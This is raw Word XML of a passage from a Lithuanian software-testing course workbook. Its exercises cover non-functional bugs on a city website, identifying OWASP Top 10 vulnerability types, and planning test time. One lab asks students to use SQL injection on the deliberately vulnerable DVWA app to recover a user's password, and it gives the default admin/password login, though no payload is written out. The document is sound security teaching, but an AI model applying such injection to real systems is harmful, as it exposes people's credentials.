        <w:t>Raskite bent 3 nefunkcine</w:t>
      </w:r>
      <w:r w:rsidR="00570B8E" w:rsidRPr="00AD4464">
        <w:t>s klaidas</w:t>
      </w:r>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> bei paaiškinkite jas</w:t>
      </w:r>
      <w:r w:rsidR="00511545">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004F6A66" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00545072" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FC18AA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokėti atpažinti nefunkcines klaidas, gebėti suskirstyti jas į atitinkama</w:t>
      </w:r>
      <w:r w:rsidR="00570B8E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s kategorijas</w:t>
      </w:r>
      <w:r w:rsidR="00FC18AA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> bei tinkamai registruoti. Suprasti skirtumą tarp funkcinių ir nefunkcinių klaidų. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FC18AA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009B6523" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>EIGA</w:t>
      </w:r>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: Aplankykite Alytaus miesto oficialią svetainę: </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.alytus.lt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:t>. Naršydami svetainėje, atkreipkite dėmesį į jos suderinamumą, pritaikymą skirtingiems įrenginiams, panagrinėkite dizaino spredimą. Pabandykite paieškoti straipsnių, atkreipkite dėmesį į paieškos rezultatus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00684867" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C43A76" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C43A76" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00C43A76" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  ĮVADAS Į OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00575A34" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TOP</w:t>
      </w:r>
      <w:r w:rsidR="00C43A76" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C43A76" w:rsidRPr="00AD4464">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00511545">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000D6E52" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nustatykite pažeidžiamumo tipus žemiau pateiktiems paveikslėliams.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004F6A66" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00ED382C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00394738" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Suprasti įvairius pažeidžiamumo tipus bei gebėti juos atpažinti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394738" w:rsidRPr="00AD4464" w:rsidRDefault="00394738" w:rsidP="00372B3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037"/>
      </w:tblGrid>
      <w:tr w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="0007794F" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74B337EF" wp14:editId="1A75CDAD">
                  <wp:extent cx="2822575" cy="2014220"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1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2575" cy="2014220"/>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pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34603772" wp14:editId="6A3BE2D5">
                  <wp:extent cx="2716530" cy="2438400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1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16530" cy="2438400"/>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pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1679FE17" wp14:editId="611583BB">
                  <wp:extent cx="5128895" cy="2756535"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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8895" cy="2756535"/>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pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116B92CD" wp14:editId="66EB6B3B">
                  <wp:extent cx="2663825" cy="2093595"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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3825" cy="2093595"/>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rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="707DAF71" wp14:editId="20C0694E">
                  <wp:extent cx="2663825" cy="1961515"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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3825" cy="1961515"/>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rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10949481" wp14:editId="2F11D110">
                  <wp:extent cx="4267200" cy="2517775"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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7200" cy="2517775"/>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rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598E0F21" wp14:editId="39E7474B">
                  <wp:extent cx="2783205" cy="2438400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2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83205" cy="2438400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="0007794F" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9037" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0007794F" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A6EE12" wp14:editId="370822F9">
                  <wp:extent cx="3034665" cy="2332355"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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34665" cy="2332355"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005F127D" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc14392432"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F77CA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas.Testuoti programinės įrangos saugumą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00684867" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t> 1</w:t>
      </w:r>
      <w:r w:rsidR="00A73785" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A73785" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00A73785" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ŽINIATINKLIO </w:t>
      </w:r>
      <w:r w:rsidR="0048553B" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PROGRAMINĖS ĮRANGOS SAUGUMO TESTAVIMO PAGRINDAI IR ĮRANKIAI</w:t>
      </w:r>
      <w:r w:rsidR="00511545">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003706EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> DVWA (Damn Vulnerable Web Application) sistemoje, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">taikydami SQL įskiepius išsiaiškinkite, koks yra vartotojo slaptažodis, kai jo ID yra </w:t>
      </w:r>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00511545">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004F6A66" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">UŽDUOTIES TIKSLAS: </w:t>
      </w:r>
      <w:r w:rsidR="006412C1" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Suprasti, kas yra SQL įskiepiai ir kaip juos taikyti su tikslu pasiekti konfidencialius vartotojo duomenis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B0109D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>EIGA</w:t>
      </w:r>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:t>: Prisijunkite prie DVWA (vartotojas: admin, slapta</w:t>
      </w:r>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">žodis: password). Pasirinkite SQL injection meniu skiltį. Į User ID laukelį įveskite </w:t>
      </w:r>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:t>skai</w:t>
      </w:r>
      <w:r w:rsidR="004F6A66" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>čių 2. Sistema pateiks vartotojo vardą ir pavardę. Išsiaiškinkite šio vartotojo slaptažodį</w:t>
      </w:r>
      <w:r w:rsidR="00C61AD0" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EB4599" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00684867" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00AA2085" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA2085" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00AA2085" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> DARBO LAIKO PLANAVIMAS IR ATASKAITOS</w:t>
      </w:r>
      <w:r w:rsidR="00511545">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004F6A66" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00C34340" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00981F5C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti planu</w:t>
      </w:r>
      <w:r w:rsidR="006E77D7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>oti laiką, skirtą testų duomenų testavimo</w:t>
      </w:r>
      <w:r w:rsidR="00981F5C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paruošimui bei testų vykdy</w:t>
      </w:r>
      <w:r w:rsidR="006E77D7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00981F5C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ui. Išmokti teikti ataskaitas apie testavimo veiklų būseną ir rezultatus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00207FF9" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a)</w:t>
      </w:r>
      <w:r w:rsidR="00C34340" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981F5C" w:rsidRPr="00AD4464">
        <w:t>Įsivaizduokite, kad turite ištestuoti funkcionalumą apibrėžtą žemiau</w:t>
      </w:r>
      <w:r w:rsidR="00626123" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> po užduotimi. </w:t>
      </w:r>
      <w:r w:rsidR="00981F5C" w:rsidRPr="00AD4464">
        <w:t>Funkcionalumas bu</w:t>
      </w:r>
      <w:r w:rsidR="00DF151F" w:rsidRPr="00AD4464">
        <w:t>s baigtas programuoti po keturių</w:t>
      </w:r>
      <w:r w:rsidR="00981F5C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> darbo dienų. </w:t>
      </w:r>
      <w:r w:rsidR="00626123" w:rsidRPr="00AD4464">
        <w:t>Tai papildomas funkcionalumas, kuriuo bus papildyta jau</w:t>
      </w:r>
      <w:r w:rsidR="00DF151F" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> dabar testavimo aplinkoje esan</w:t>
      </w:r>
      <w:r w:rsidR="00626123" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">ti sistema. </w:t>
      </w:r>
      <w:r w:rsidR="00981F5C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Testavimui turite tris darbo dienas, t.y. </w:t>
      </w:r>
      <w:r w:rsidR="000C20B1" w:rsidRPr="00AD4464">
        <w:t> 24 </w:t>
      </w:r>
      <w:r w:rsidR="00FB76A1" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">darbo </w:t>
      </w:r>
      <w:r w:rsidR="00DF151F" w:rsidRPr="00AD4464">
        <w:t>valandas. Jūs esate vieninte</w:t>
